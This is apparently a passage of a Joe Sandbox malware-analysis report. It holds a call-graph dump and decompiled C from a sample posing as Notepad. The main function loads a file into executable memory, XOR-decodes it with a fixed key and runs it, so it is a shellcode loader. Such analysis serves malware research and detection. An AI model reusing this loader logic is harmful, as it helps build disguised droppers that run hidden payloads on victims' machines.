10a58ef 16683->16686 16684->16683 16685->16657 16689 10a89b8 LeaveCriticalSection 16686->16689 16688 10a58f6 16688->16657 16689->16688 16690 10afcd9 16691 10afce5 _wprintf 16690->16691 16692 10afcf1 16691->16692 16693 10afd06 _wprintf 16691->16693 16694 10a6117 _wprintf 70 API calls 16692->16694 16697 10a4c33 _wprintf 71 API calls 16693->16697 16695 10afcf6 16694->16695 16696 10a4035 _wprintf 9 API calls 16695->16696 16699 10afd01 _wprintf 16696->16699 16698 10afd16 _wprintf 16697->16698 16700 10a9a11 __stbuf 71 API calls 16698->16700 16701 10afd2a _wprintf 
16700->16701 16707 10affaa 16701->16707 16703 10afd44 _wprintf 16704 10a99e0 __ftbuf 103 API calls 16703->16704 16705 10afd58 16704->16705 16733 10afd72 16705->16733 16708 10a9233 _LocaleUpdate::_LocaleUpdate 80 API calls 16707->16708 16709 10b0017 16708->16709 16710 10a6117 _wprintf 70 API calls 16709->16710 16711 10b001c 16710->16711 16737 10a732b InitOnceExecuteOnce 16711->16737 16713 10b018e 16719 10a5b2a __wsetlocale_set_cat 6 API calls 16713->16719 16714 10b0af8 16715 10a6117 _wprintf 70 API calls 16714->16715 16717 10b0afd 16715->16717 16716 10b0027 16716->16713 16716->16714 16718 10a66b0 __fflush_nolock 70 API calls 16716->16718 16721 10b0043 __aulldvrm __output_s_l _strlen 16716->16721 16720 10a4035 _wprintf 9 API calls 16717->16720 16718->16721 16722 10b0b2b 16719->16722 16720->16713 16721->16713 16721->16714 16723 10af98a __isleadbyte_l 80 API calls 16721->16723 16724 10b2dd1 103 API calls __output_s_l 16721->16724 16725 10b06f8 DecodePointer 16721->16725 16726 10b2e43 103 API calls _write_string 16721->16726 16727 10a8c4b _free 70 API calls 16721->16727 16728 10a8ccd __malloc_crt 70 API calls 16721->16728 16729 10b075b DecodePointer 16721->16729 16730 10b0780 DecodePointer 16721->16730 16731 10b52c6 82 API calls __cftof 16721->16731 16732 10b2e17 103 API calls _write_multi_char 16721->16732 16722->16703 16723->16721 16724->16721 16725->16721 16726->16721 16727->16721 16728->16721 16729->16721 16730->16721 16731->16721 16732->16721 16734 10afd77 _wprintf 16733->16734 16735 10a4c9d __getstream 2 API calls 16734->16735 16736 10afd82 16735->16736 16736->16699 16737->16716 12445 10a3cf5 12481 10a7f04 12445->12481 12447 10a3cfa _wprintf 12486 10a80dd GetStartupInfoW 12447->12486 12449 10a3d10 12488 10a7bcc GetProcessHeap 12449->12488 12451 10a3d68 12454 10a3d73 12451->12454 12591 10a3e89 12451->12591 12489 10a7b33 12454->12489 12455 10a3d79 12456 10a3e89 _fast_error_exit 70 API calls 12455->12456 12457 10a3d84 __ioinit0 __RTC_Initialize 12455->12457 
12456->12457 12458 10a3d93 GetCommandLineA 12457->12458 12510 10a7fde GetEnvironmentStringsW 12458->12510 12463 10a3db8 12534 10a7e23 12463->12534 12467 10a3dc9 12552 10a4517 12467->12552 12468 10a44dd __amsg_exit 70 API calls 12468->12467 12470 10a3dd1 12471 10a3ddc 12470->12471 12473 10a44dd __amsg_exit 70 API calls 12470->12473 12558 10a8183 12471->12558 12473->12471 12476 10a3df0 12477 10a3dff 12476->12477 12606 10a47cd 12476->12606 12609 10a4508 12477->12609 12480 10a3e04 _wprintf 12482 10a7f27 12481->12482 12483 10a7f34 GetSystemTimeAsFileTime GetCurrentThreadId GetTickCount64 QueryPerformanceCounter 12481->12483 12482->12483 12485 10a7f2b 12482->12485 12484 10a7f75 12483->12484 12484->12485 12485->12447 12487 10a80f3 12486->12487 12487->12449 12488->12451 12612 10a461a RtlEncodePointer 12489->12612 12494 10a7b41 12620 10a7ba9 12494->12620 12498 10a7b53 12498->12494 12499 10a7b5e 12498->12499 12630 10a8c83 12499->12630 12502 10a7ba0 12504 10a7ba9 __mtterm 73 API calls 12502->12504 12506 10a7ba5 12504->12506 12505 10a7b7f 12505->12502 12507 10a7b85 12505->12507 12506->12455 12636 10a7a87 12507->12636 12509 10a7b8d GetCurrentThreadId 12509->12455 12511 10a7ff1 WideCharToMultiByte 12510->12511 12512 10a3da3 12510->12512 12514 10a805b FreeEnvironmentStringsW 12511->12514 12515 10a8024 12511->12515 12523 10a7bf6 12512->12523 12514->12512 12516 10a8ccd __malloc_crt 70 API calls 12515->12516 12517 10a802a 12516->12517 12517->12514 12518 10a8031 WideCharToMultiByte 12517->12518 12519 10a8050 FreeEnvironmentStringsW 12518->12519 12520 10a8047 12518->12520 12519->12512 12521 10a8c4b _free 70 API calls 12520->12521 12522 10a804d 12521->12522 12522->12519 12524 10a7c09 GetModuleFileNameA 12523->12524 12525 10a7c04 12523->12525 12527 10a7c36 12524->12527 12915 10a9215 12525->12915 12909 10a7ca7 12527->12909 12529 10a3dad 12529->12463 12599 10a44dd 12529->12599 12531 10a8ccd __malloc_crt 70 API calls 12532 10a7c6f 12531->12532 12532->12529 12533 10a7ca7 _parse_cmdline 80 
API calls 12532->12533 12533->12529 12535 10a7e2c 12534->12535 12539 10a7e31 _strlen 12534->12539 12536 10a9215 ___initmbctable 96 API calls 12535->12536 12536->12539 12537 10a3dbe 12537->12467 12537->12468 12538 10a7e5c 12540 10a8c83 __calloc_crt 70 API calls 12538->12540 12539->12537 12539->12538 12548 10a7e67 _strlen 12540->12548 12541 10a7eb9 12542 10a8c4b _free 70 API calls 12541->12542 12543 10a7ec5 12542->12543 12543->12537 12544 10a8c83 __calloc_crt 70 API calls 12544->12548 12545 10a7ee0 12547 10a8c4b _free 70 API calls 12545->12547 12547->12543 12548->12537 12548->12541 12548->12544 12548->12545 12549 10a7ef7 12548->12549 13362 10aef4a 12548->13362 12550 10a4060 ___get_qualified_locale 8 API calls 12549->12550 12551 10a7f03 12550->12551 12553 10a4523 __IsNonwritableInCurrentImage 12552->12553 13371 10a8de9 12553->13371 12555 10a4541 __initterm_e 12557 10a4562 __IsNonwritableInCurrentImage 12555->12557 13374 10a8c36 12555->13374 12557->12470 12559 10a818f 12558->12559 12561 10a8194 12558->12561 12560 10a9215 ___initmbctable 96 API calls 12559->12560 12560->12561 12562 10aee90 __wincmdln 80 API calls 12561->12562 12563 10a3de2 12561->12563 12562->12561 12564 10a28a0 12563->12564 13439 10a3542 12564->13439 12568 10a28c5 13455 10a3b7f 12568->13455 12570 10a28ce 12571 10a3c76 _fseek 108 API calls 12570->12571 12572 10a28dd VirtualAlloc 12571->12572 13468 10a377a 12572->13468 12576 10a2930 RegisterWindowMessageW 12577 10a2952 _memset 12576->12577 12578 10a2970 6 API calls 12577->12578 12579 10a2a0d MonitorFromRect GetMonitorInfoW 12578->12579 12580 10a2a02 12578->12580 12581 10a2a3f 12579->12581 12582 10a2a37 ExitProcess 12579->12582 12580->12476 13471 10a1420 GetWindowTextLengthW SendMessageW 12581->13471 12585 10a2a9a 12587 10a2ab0 IsDialogMessageW 12585->12587 12586 10a2afd 12586->12476 12588 10a2aec GetMessageW 12587->12588 12589 10a2ac5 TranslateAcceleratorW 12587->12589 12588->12586 12588->12587 12589->12588 12590 10a2ade TranslateMessage DispatchMessageW 
12589->12590 12590->12588 12592 10a3e9a 12591->12592 12593 10a3e95 12591->12593 12595 10a5b96 __NMSG_WRITE 70 API calls 12592->12595 12594 10a5b39 __FF_MSGBANNER 70 API calls 12593->12594 12594->12592 12596 10a3ea2 12595->12596 12597 10a43c0 __mtinitlocknum 3 API calls 12596->12597 12598 10a3eac 12597->12598 12598->12454 12600 10a5b39 __FF_MSGBANNER 70 API calls 12599->12600 12601 10a44e5 12600->12601 12602 10a5b96 __NMSG_WRITE 70 API calls 12601->12602 12603 10a44ed 12602->12603 14329 10a45a8 12603->14329 12607 10a469e _doexit 70 API calls 12606->12607 12608 10a47dc 12607->12608 12608->12477 12610 10a469e _doexit 70 API calls 12609->12610 12611 10a4513 12610->12611 12611->12480 12613 10a462b __init_pointers __initp_misc_winsig 12612->12613 12648 10a8e87 EncodePointer 12613->12648 12615 10a4649 12616 10a8983 12615->12616 12617 10a898f 12616->12617 12618 10a8995 InitializeCriticalSectionAndSpinCount 12617->12618 12619 10a7b3d 12617->12619 12618->12617 12619->12494 12629 10a80a2 FlsAlloc 12619->12629 12621 10a7bb3 12620->12621 12623 10a7bb9 12620->12623 12649 10a80b0 FlsFree 12621->12649 12624 10a889e DeleteCriticalSection 12623->12624 12625 10a88ba 12623->12625 12650 10a8c4b 12624->12650 12627 10a88c6 DeleteCriticalSection 12625->12627 12628 10a7b46 12625->12628 12627->12625 12628->12455 12629->12498 12632 10a8c8a 12630->12632 12633 10a7b6b 12632->12633 12634 10a8ca8 Sleep 12632->12634 12675 10af1b3 12632->12675 12633->12502 12635 10a80cc FlsSetValue 12633->12635 12634->12632 12635->12505 12637 10a7a93 _wprintf 12636->12637 12685 10a8834 12637->12685 12639 10a7ac9 InterlockedIncrement 12692 10a7b21 12639->12692 12642 10a8834 __lock 69 API calls 12643 10a7aea 12642->12643 12695 10ae973 InterlockedIncrement 12643->12695 12645 10a7b08 12707 10a7b2a 12645->12707 12647 10a7b15 _wprintf 12647->12509 12648->12615 12649->12623 12651 10a8c7d __dosmaperr 12650->12651 12652 10a8c54 HeapFree 12650->12652 12651->12623 12652->12651 12653 10a8c69 12652->12653 12656 10a6117 
12653->12656 12659 10a7a18 GetLastError 12656->12659 12658 10a611c GetLastError 12658->12651 12673 10a80be FlsGetValue 12659->12673 12661 10a7a2d 12662 10a7a7b SetLastError 12661->12662 12663 10a8c83 __calloc_crt 67 API calls 12661->12663 12662->12658 12664 10a7a40 12663->12664 12664->12662 12674 10a80cc FlsSetValue 12664->12674 12666 10a7a54 12667 10a7a5a 12666->12667 12668 10a7a72 12666->12668 12669 10a7a87 __initptd 67 API calls 12667->12669 12670 10a8c4b _free 67 API calls 12668->12670 12671 10a7a62 GetCurrentThreadId 12669->12671 12672 10a7a78 12670->12672 12671->12662 12672->12662 12673->12661 12674->12666 12676 10af1be 12675->12676 12680 10af1d9 12675->12680 12677 10af1ca 12676->12677 12676->12680 12678 10a6117 _wprintf 69 API calls 12677->12678 12681 10af1cf 12678->12681 12679 10af1e9 HeapAlloc 12679->12680 12679->12681 12680->12679 12680->12681 12683 10a8ee3 DecodePointer 12680->12683 12681->12632 12684 10a8ef6 12683->12684 12684->12680 12686 10a8858 EnterCriticalSection 12685->12686 12687 10a8845 12685->12687 12686->12639 12710 10a88dc 12687->12710 12689 10a884b 12689->12686 12690 10a44dd __amsg_exit 69 API calls 12689->12690 12691 10a8857 12690->12691 12691->12686 12907 10a89b8 LeaveCriticalSection 12692->12907 12694 10a7ae3 12694->12642 12696 10ae98b InterlockedIncrement 12695->12696 12697 10ae990 12695->12697 12696->12697 12698 10ae99a InterlockedIncrement 12697->12698 12699 10ae99d 12697->12699 12698->12699 12700 10ae9a8 12699->12700 12701 10ae9a3 InterlockedIncrement 12699->12701 12702 10ae9b2 InterlockedIncrement 12700->12702 12703 10ae9b5 12700->12703 12701->12700 12702->12703 12704 10ae9cc InterlockedIncrement 12703->12704 12705 10ae9df InterlockedIncrement 12703->12705 12706 10ae9f0 InterlockedIncrement 12703->12706 12704->12703 12705->12703 12706->12645 12908 10a89b8 LeaveCriticalSection 12707->12908 12709 10a7b31 12709->12647 12711 10a88e8 _wprintf 12710->12711 12712 10a8909 12711->12712 12713 10a88f1 12711->12713 12727 10a8929 _wprintf 
GetConsoleMode 14207 10a6a99 14203->14207 14208 10a6ae5 14203->14208 14204->14172 14214 10a60f6 __dosmaperr 70 API calls 14205->14214 14228 10a6ace 14205->14228 14210 10a6117 _wprintf 70 API calls 14206->14210 14207->14208 14211 10a6a9f ReadConsoleW 14207->14211 14208->14198 14219 10a6b3f 14209->14219 14220 10a6dac 14209->14220 14209->14228 14212 10a6fda 14210->14212 14211->14209 14213 10a6ac2 GetLastError 14211->14213 14215 10a60e3 __read_nolock 70 API calls 14212->14215 14213->14205 14214->14228 14215->14228 14216 10a8c4b _free 70 API calls 14216->14172 14218 10a6bab ReadFile 14222 10a6bcc GetLastError 14218->14222 14233 10a6bd6 14218->14233 14219->14218 14225 10a6c2c 14219->14225 14221 10a6eb2 ReadFile 14220->14221 14220->14228 14227 10a6ed5 GetLastError 14221->14227 14234 10a6ee3 14221->14234 14222->14233 14223 10a6ce9 14229 10a6c99 MultiByteToWideChar 14223->14229 14230 10a7289 __lseeki64_nolock 73 API calls 14223->14230 14224 10a6cd9 14226 10a6117 _wprintf 70 API calls 14224->14226 14225->14223 14225->14224 14225->14228 14225->14229 14226->14228 14227->14234 14228->14172 14228->14216 14229->14213 14229->14228 14230->14229 14231 10a7289 __lseeki64_nolock 73 API calls 14231->14233 14232 10a7289 __lseeki64_nolock 73 API calls 14232->14234 14233->14219 14233->14231 14234->14220 14234->14232 14236 10a658d 14235->14236 14237 10a65a2 14235->14237 14238 10a6117 _wprintf 70 API calls 14236->14238 14283 10a732b InitOnceExecuteOnce 14237->14283 14240 10a6592 14238->14240 14241 10a4035 _wprintf 9 API calls 14240->14241 14242 10a659d 14241->14242 14242->14155 14243 10a65a7 14243->14242 14244 10a65e4 14243->14244 14284 10ae1d7 14243->14284 14246 10a66b0 __fflush_nolock 70 API calls 14244->14246 14247 10a65f8 14246->14247 14287 10a6770 14247->14287 14249 10a65ff 14249->14242 14250 10a66b0 __fflush_nolock 70 API calls 14249->14250 14251 10a6622 14250->14251 14251->14242 14252 10a66b0 __fflush_nolock 70 API calls 14251->14252 14253 10a662e 14252->14253 14253->14242 14254 
10a66b0 __fflush_nolock 70 API calls 14253->14254 14255 10a663b 14254->14255 14256 10a66b0 __fflush_nolock 70 API calls 14255->14256 14256->14242 14258 10a40bf 14257->14258 14267 10a40bb _memmove 14257->14267 14259 10a40d9 _memset 14258->14259 14260 10a40c6 14258->14260 14264 10a4110 14259->14264 14265 10a4107 14259->14265 14259->14267 14261 10a6117 _wprintf 70 API calls 14260->14261 14262 10a40cb 14261->14262 14263 10a4035 _wprintf 9 API calls 14262->14263 14263->14267 14264->14267 14269 10a6117 _wprintf 70 API calls 14264->14269 14266 10a6117 _wprintf 70 API calls 14265->14266 14268 10a410c 14266->14268 14267->14155 14270 10a4035 _wprintf 9 API calls 14268->14270 14269->14268 14270->14267 14271->14175 14273 10ae42a 14272->14273 14274 10ae437 14272->14274 14275 10a6117 _wprintf 70 API calls 14273->14275 14282 10a732b InitOnceExecuteOnce 14274->14282 14278 10a6a6f 14275->14278 14277 10ae43c 14277->14278 14279 10a6117 _wprintf 70 API calls 14277->14279 14278->14198 14278->14203 14280 10ae472 14279->14280 14281 10a4035 _wprintf 9 API calls 14280->14281 14281->14278 14282->14277 14283->14243 14285 10a8ccd __malloc_crt 70 API calls 14284->14285 14286 10ae1ec 14285->14286 14286->14244 14288 10a677c _wprintf 14287->14288 14289 10a679c 14288->14289 14290 10a6784 14288->14290 14319 10a732b InitOnceExecuteOnce 14289->14319 14291 10a60e3 __read_nolock 70 API calls 14290->14291 14293 10a6789 14291->14293 14294 10a6117 _wprintf 70 API calls 14293->14294 14296 10a6791 _wprintf 14294->14296 14295 10a6864 14298 10a60e3 __read_nolock 70 API calls 14295->14298 14296->14249 14297 10a67a1 14297->14295 14297->14296 14299 10a67df 14297->14299 14300 10a6869 14298->14300 14301 10a67ec 14299->14301 14302 10a6801 14299->14302 14303 10a6117 _wprintf 70 API calls 14300->14303 14304 10a60e3 __read_nolock 70 API calls 14301->14304 14305 10ae482 ___lock_fhandle 72 API calls 14302->14305 14306 10a67f9 14303->14306 14307 10a67f1 14304->14307 14308 10a6807 14305->14308 14312 10a4035 _wprintf 9 API 
calls 14306->14312 14309 10a6117 _wprintf 70 API calls 14307->14309 14310 10a681a 14308->14310 14311 10a682d 14308->14311 14309->14306 14314 10a6885 __read_nolock 83 API calls 14310->14314 14313 10a6117 _wprintf 70 API calls 14311->14313 14312->14296 14315 10a6832 14313->14315 14316 10a6826 14314->14316 14317 10a60e3 __read_nolock 70 API calls 14315->14317 14320 10a685c 14316->14320 14317->14316 14319->14297 14323 10ae94d LeaveCriticalSection 14320->14323 14322 10a6862 14322->14296 14323->14322 14327 10a66e0 14324->14327 14328 10a1786 lstrcpyW GetSaveFileNameW 14327->14328 14328->13474 14332 10a469e 14329->14332 14331 10a44f8 14333 10a46aa _wprintf 14332->14333 14334 10a8834 __lock 63 API calls 14333->14334 14335 10a46b1 14334->14335 14336 10a476a __initterm 14335->14336 14337 10a46df DecodePointer 14335->14337 14352 10a47b8 14336->14352 14337->14336 14339 10a46f6 DecodePointer 14337->14339 14345 10a4706 14339->14345 14341 10a47c7 _wprintf 14341->14331 14343 10a4713 EncodePointer 14343->14345 14344 10a47af 14346 10a47b8 14344->14346 14347 10a43c0 __mtinitlocknum 3 API calls 14344->14347 14345->14336 14345->14343 14349 10a4723 DecodePointer EncodePointer 14345->14349 14348 10a47c5 14346->14348 14357 10a89b8 LeaveCriticalSection 14346->14357 14347->14346 14348->14331 14351 10a4735 DecodePointer DecodePointer 14349->14351 14351->14345 14353 10a47be 14352->14353 14354 10a4798 14352->14354 14358 10a89b8 LeaveCriticalSection 14353->14358 14354->14341 14356 10a89b8 LeaveCriticalSection 14354->14356 14356->14344 14357->14348 14358->14354

                                                  Control-flow Graph

                                                  C-Code - Quality: 73%
                                                  			E010A28A0(void* __edx, void* __eflags, struct HINSTANCE__* _a4, intOrPtr _a12, int _a16) {
                                                  				struct _WNDCLASSEXW _v52;
                                                  				struct tagMONITORINFO _v100;
                                                  				struct tagMSG _v128;
                                                  				struct HACCEL__* _v132;
                                                  				void* __ebx;
                                                  				void* __edi;
                                                  				void* __esi;
                                                  				void* __ebp;
                                                  				void* _t38;
                                                  				long _t40;
                                                  				void* _t42;
                                                  				char* _t47;
                                                  				int _t49;
                                                  				struct HMONITOR__* _t54;
                                                  				int _t62;
                                                  				int _t65;
                                                  				int _t67;
                                                  				int _t69;
                                                  				void* _t78;
                                                  				void* _t80;
                                                  				void* _t81;
                                                  				int _t85;
                                                  				void* _t92;
                                                  				long _t93;
                                                  				struct HINSTANCE__* _t94;
                                                  				void* _t99;
                                                  				signed int _t100;
                                                  
                                                  				_push(_t80);
                                                  				_push(_t92);
                                                  				_t38 = E010A3542(_a12, "rb"); // executed
                                                  				_push(2);
                                                  				_t99 = _t38;
                                                  				_push(0);
                                                  				_push(_t99); // executed
                                                  				E010A3C76(_t80, __edx, _t92, _t99, __eflags); // executed
                                                  				_push(_t99); // executed
                                                  				_t40 = E010A3B7F(_t80, __edx, _t92, _t99, __eflags); // executed
                                                  				_t93 = _t40;
                                                  				_push(0);
                                                  				_push(0);
                                                  				_push(_t99); // executed
                                                  				E010A3C76(_t80, __edx, _t93, _t99, __eflags); // executed
                                                  				_t42 = VirtualAlloc(0, _t93, 0x3000, 0x40); // executed
                                                  				_t81 = _t42;
                                                  				E010A377A(_t81, _t93, 1, _t99); // executed
                                                  				_t100 = 0;
                                                  				if(_t93 != 0) {
                                                  					do {
                                                  						_t78 = _t100 - ((0xaaaaaaab * _t100 >> 0x20 >> 3) + (0xaaaaaaab * _t100 >> 0x20 >> 3) * 2 << 2);
                                                  						_t100 = _t100 + 1;
                                                  						_t8 = _t78 + "248058040134"; // 0x30383432
                                                  						 *(_t81 + _t100 - 1) =  *(_t81 + _t100 - 1) ^  *_t8;
                                                  					} while (_t100 < _t93);
                                                  				}
                                                  				 *_t81(); // executed
                                                  				__imp__#17();
                                                  				 *0x10c2dac = RegisterWindowMessageW(L"commdlg_FindReplace");
                                                  				E010A66E0(0x10c3f20, 0, 0x11f4);
                                                  				_t94 = _a4;
                                                  				 *0x10c3f20 = _t94;
                                                  				_t85 = 0x30;
                                                  				_t47 =  &_v52;
                                                  				do {
                                                  					 *_t47 = 0;
                                                  					_t47 = _t47 + 1;
                                                  					_t85 = _t85 - 1;
                                                  				} while (_t85 != 0);
                                                  				_v52.cbSize = 0x30;
                                                  				_v52.lpfnWndProc = 0x10a2890;
                                                  				_v52.hInstance = _t94;
                                                  				_v52.hIcon = LoadIconW(_t94, 0x300);
                                                  				_t49 = GetSystemMetrics(0x32);
                                                  				_v52.hIconSm = LoadImageW( *0x10c3f20, 0x300, 1, GetSystemMetrics(0x31), _t49, 0x8000);
                                                  				_v52.hCursor = LoadCursorW(0, 0x7f00);
                                                  				_v52.hbrBackground = 6;
                                                  				_v52.lpszMenuName = 0x201;
                                                  				_v52.lpszClassName = L"Notepad";
                                                  				_t54 = RegisterClassExW( &_v52);
                                                  				if(_t54 != 0) {
                                                  					__imp__MonitorFromRect(0x10c2d9c, 1);
                                                  					_v100.cbSize = 0x28;
                                                  					GetMonitorInfoW(_t54,  &_v100);
                                                  					__eflags =  *0x10c3f24;
                                                  					if( *0x10c3f24 == 0) {
                                                  						ExitProcess(1);
                                                  					}
                                                  					E010A1420();
                                                  					ShowWindow( *0x10c3f24, _a16);
                                                  					UpdateWindow( *0x10c3f24);
                                                  					DragAcceptFiles( *0x10c3f24, 1);
                                                  					GetCommandLineW();
                                                  					_v132 = LoadAcceleratorsW(_t94, 0x203);
                                                  					_t62 = GetMessageW( &_v128, 0, 0, 0);
                                                  					__eflags = _t62;
                                                  					if(_t62 != 0) {
                                                  						do {
                                                  							_t65 = IsDialogMessageW( *0x10c3f28,  &_v128);
                                                  							__eflags = _t65;
                                                  							if(_t65 == 0) {
                                                  								_t69 = TranslateAcceleratorW( *0x10c3f24, _v132,  &_v128);
                                                  								__eflags = _t69;
                                                  								if(_t69 == 0) {
                                                  									TranslateMessage( &_v128);
                                                  									DispatchMessageW( &_v128);
                                                  								}
                                                  							}
                                                  							_t67 = GetMessageW( &_v128, 0, 0, 0);
                                                  							__eflags = _t67;
                                                  						} while (_t67 != 0);
                                                  					}
                                                  					return _v128.wParam;
                                                  				} else {
                                                  					return 0;
                                                  				}
                                                  			}































                                                  APIs
                                                    • Part of subcall function 010A3542: __fsopen.LIBCMT ref: 010A354D
                                                  • _fseek.LIBCMT ref: 010A28C0
                                                  • _fseek.LIBCMT ref: 010A28D8
                                                    • Part of subcall function 010A3C76: __lock_file.LIBCMT ref: 010A3CB7
                                                    • Part of subcall function 010A3C76: __fseek_nolock.LIBCMT ref: 010A3CC6
                                                  • VirtualAlloc.KERNELBASE(00000000,00000000,00003000,00000040,?,?,?,?,?,?,?,?,00000000), ref: 010A28EA
                                                  • __fread_nolock.LIBCMT ref: 010A28F7
                                                  • #17.COMCTL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 010A2928
                                                  • RegisterWindowMessageW.USER32(commdlg_FindReplace,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 010A2935
                                                  • _memset.LIBCMT ref: 010A294D
                                                  • LoadIconW.USER32 ref: 010A298A
                                                  • GetSystemMetrics.USER32 ref: 010A29A1
                                                  • GetSystemMetrics.USER32 ref: 010A29A6
                                                  • LoadImageW.USER32 ref: 010A29B6
                                                  • LoadCursorW.USER32(00000000,00007F00), ref: 010A29CA
                                                  • RegisterClassExW.USER32 ref: 010A29F7
                                                  • MonitorFromRect.USER32(010C2D9C,00000001), ref: 010A2A14
                                                  • GetMonitorInfoW.USER32 ref: 010A2A28
                                                  • ExitProcess.KERNEL32 ref: 010A2A39
                                                    • Part of subcall function 010A1420: GetWindowTextLengthW.USER32(76F12D10), ref: 010A1427
                                                    • Part of subcall function 010A1420: SendMessageW.USER32(000000B8,00000000,00000000), ref: 010A143E
                                                  • ShowWindow.USER32(?,?,?,?,?,?,?,?), ref: 010A2A4D
                                                  • UpdateWindow.USER32 ref: 010A2A59
                                                  • DragAcceptFiles.SHELL32(00000001), ref: 010A2A67
                                                  • GetCommandLineW.KERNEL32(?,?,?,?,?,?,?), ref: 010A2A6D
                                                  • LoadAcceleratorsW.USER32 ref: 010A2A79
                                                  • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 010A2A94
                                                  • IsDialogMessageW.USER32 ref: 010A2ABB
                                                  • TranslateAcceleratorW.USER32(?,?), ref: 010A2AD4
                                                  • TranslateMessage.USER32(?), ref: 010A2AE3
                                                  • DispatchMessageW.USER32 ref: 010A2AEA
                                                  • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 010A2AF7
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.257888130.00000000010A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 010A0000, based on PE: true
                                                  • Associated: 00000001.00000002.257880758.00000000010A0000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000001.00000002.257907719.00000000010BC000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000001.00000002.257934514.00000000010C1000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000001.00000002.257978063.00000000010C6000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_10a0000_oaqcoreqiw.jbxd
                                                  Similarity
                                                  • API ID: Message$LoadWindow$MetricsMonitorRegisterSystemTranslate_fseek$AcceleratorAcceleratorsAcceptAllocClassCommandCursorDialogDispatchDragExitFilesFromIconImageInfoLengthLineProcessRectSendShowTextUpdateVirtual__fread_nolock__fseek_nolock__fsopen__lock_file_memset
                                                  • String ID: ($0$Notepad$commdlg_FindReplace
                                                  • API String ID: 1672473475-3416331526
                                                  • Opcode ID: f8d20d228c65e057ec61dd4220d35292c206ccab7122985762876c5affa35050
                                                  • Instruction ID: 371b7687be9af811e0789ca4951b30671ce9d30513af48d672cbe41d9ad7ca59
                                                  • Opcode Fuzzy Hash: f8d20d228c65e057ec61dd4220d35292c206ccab7122985762876c5affa35050
                                                  • Instruction Fuzzy Hash: 2251C472544301AFE720AFE4DD89FDB7BE8FB44B40F404429F6C59A194D7B69904CBA2
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  C-Code - Quality: 95%
                                                  			_entry_(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                                                  				intOrPtr _t17;
                                                  				intOrPtr _t23;
                                                  				void* _t24;
                                                  				void* _t25;
                                                  				void* _t26;
                                                  				intOrPtr _t28;
                                                  				signed int _t38;
                                                  				void* _t47;
                                                  				signed int _t50;
                                                  				void* _t52;
                                                  				void* _t54;
                                                  
                                                  				_t48 = __edi;
                                                  				_t47 = __edx;
                                                  				E010A7F04();
                                                  				_push(0x14);
                                                  				_push(0x10befc0);
                                                  				E010A61F0(__ebx, __edi, __esi);
                                                  				_t50 = E010A80DD() & 0x0000ffff;
                                                  				E010A4843(2);
                                                  				_t54 =  *0x10a0000 - 0x5a4d; // 0x5a4d
                                                  				if(_t54 == 0) {
                                                  					_t17 =  *0x10a003c; // 0xe8
                                                  					__eflags =  *((intOrPtr*)(_t17 + 0x10a0000)) - 0x4550;
                                                  					if( *((intOrPtr*)(_t17 + 0x10a0000)) != 0x4550) {
                                                  						goto L2;
                                                  					} else {
                                                  						__eflags =  *((intOrPtr*)(_t17 + 0x10a0018)) - 0x10b;
                                                  						if( *((intOrPtr*)(_t17 + 0x10a0018)) != 0x10b) {
                                                  							goto L2;
                                                  						} else {
                                                  							_t38 = 0;
                                                  							__eflags =  *((intOrPtr*)(_t17 + 0x10a0074)) - 0xe;
                                                  							if( *((intOrPtr*)(_t17 + 0x10a0074)) > 0xe) {
                                                  								__eflags =  *(_t17 + 0x10a00e8);
                                                  								_t6 =  *(_t17 + 0x10a00e8) != 0;
                                                  								__eflags = _t6;
                                                  								_t38 = 0 | _t6;
                                                  							}
                                                  						}
                                                  					}
                                                  				} else {
                                                  					L2:
                                                  					_t38 = 0;
                                                  				}
                                                  				 *(_t52 - 0x1c) = _t38;
                                                  				if(E010A7BCC() == 0) {
                                                  					E010A3E89(_t38, _t47, _t48, _t50, 0x1c);
                                                  				}
                                                  				if(E010A7B33(_t38, _t48) == 0) {
                                                  					_t19 = E010A3E89(_t38, _t47, _t48, _t50, 0x10);
                                                  				}
                                                  				E010A7F9E(_t19);
                                                  				 *(_t52 - 4) =  *(_t52 - 4) & 0x00000000;
                                                  				E010A7347();
                                                  				 *0x10c3f18 = GetCommandLineA(); // executed
                                                  				_t23 = E010A7FDE(); // executed
                                                  				 *0x10c2120 = _t23;
                                                  				_t24 = E010A7BF6();
                                                  				_t57 = _t24;
                                                  				if(_t24 < 0) {
                                                  					E010A44DD(_t38, _t47, _t48, _t50, _t57, 8);
                                                  				}
                                                  				_t25 = E010A7E23(_t38, _t47);
                                                  				_t58 = _t25;
                                                  				if(_t25 < 0) {
                                                  					E010A44DD(_t38, _t47, _t48, _t50, _t58, 9);
                                                  				}
                                                  				_t26 = E010A4517(_t48, _t50, 1);
                                                  				_t59 = _t26;
                                                  				if(_t26 != 0) {
                                                  					E010A44DD(_t38, _t47, _t48, _t50, _t59, _t26);
                                                  				}
                                                  				_t28 = E010A28A0(_t47, _t59, 0x10a0000, 0, E010A8183(), _t50); // executed
                                                  				_t51 = _t28;
                                                  				 *((intOrPtr*)(_t52 - 0x24)) = _t28;
                                                  				if(_t38 == 0) {
                                                  					E010A47CD(_t51);
                                                  				}
                                                  				E010A4508();
                                                  				 *(_t52 - 4) = 0xfffffffe;
                                                  				return E010A6235(_t51);
                                                  			}















                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.257888130.00000000010A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 010A0000, based on PE: true
                                                  • Associated: 00000001.00000002.257880758.00000000010A0000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000001.00000002.257907719.00000000010BC000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000001.00000002.257934514.00000000010C1000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000001.00000002.257978063.00000000010C6000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
